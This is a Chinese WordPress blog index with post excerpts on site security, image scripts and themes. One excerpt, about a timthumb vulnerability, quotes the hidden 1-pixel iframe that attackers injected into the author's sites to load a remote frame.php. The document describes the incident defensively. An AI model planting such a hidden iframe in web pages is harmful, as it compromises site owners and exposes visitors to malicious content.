生活琐记

被360坑了。。

一大早就收到hostgator的邮件,说服务器被限制了,因为CPU负载过高。我以为被黑了,看了半天访问日志发现来自3个IP地址的访问量非常大,把access log搞到40M的尺寸,我以为被黑了,原来是被360网站安全检测坑了。

Read More
WordPress主题开发

WordPress图片处理脚本bfi_thumb

bfi_thumb是一款类似于TimThumb的图片处理php脚本,由于timthumb的安全性问题,很多WordPress主题不再使用这个脚本,bfi_thumb是一款很好的替代产品。它通过扩展WordPress Image Editor class来实现各种图片处理效果,相比timthumb更加安全。

Read More
WordPress News

警惕最近的WordPress SPAM Attack

刚刚一个客户的网站被黑了,看了一下是主题的header.php中多了一段代码,这段代码虽然不会搞的网站死掉,但会在页面中加一段spam信息,用户看不到,但搜索引擎可以,不注意的话或许不会发现,所以多多注意一下自己的WP站点。

Read More
WordPress

实用的工具网站

上周重装电脑忘记保存收藏夹,收集的好网站丢光光了,遂决定撰文一篇,遇到好的网站就装起来,有些是常用的,有些是偶尔用到,忘记就太可惜了。

Read More
WordPress

5个使WordPress更加安全的方法

WordPress Security Tips

你知道全世界有大约7300万个站点使用WordPress吗?这个数字意味着WordPress比Microsoft SharePoint,、Blogger,或者 Drupal更受欢迎,所谓树大招风,WordPress也理所应当变成骇客攻击的目标。

Read More
WordPress

timthumb漏洞导致iframe攻击,wp-settings.php被修改

wordpress主题中一个很常用的处理图片的工具timthumb.php因为远程存储文件时候的验证上不足而产生了漏洞,允许在cache文件夹中执行一些php脚本,这已经不是什么秘密,可我就是中了招。 某天打开网站,发现服务器上所有的wordpress网站在firefox中都会打开一个弹出窗口,提示下载frame.php,这应该不是代码本意,不知道我的firefox出了啥问题,其实是在源代码里多了隐藏的iframe,用firebug查看源代码,可以看到下面的内容

<iframe id="iframe" src="%20http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px;">

Read More
WordPress

移除Magpress主题的footer链接看wordpress免费主题安全性

最近发现一个主题网站叫mapgress.com,主题功能很不错,无论是前台外观还是后台功能都不输给收费主题,应客户的要求拿来三个主题开始做定制化。开始做的时候就发现了,这个网站主题的footer代码不可以更改!无论是删除全部链接,还是添加自己的链接都不行!

Read More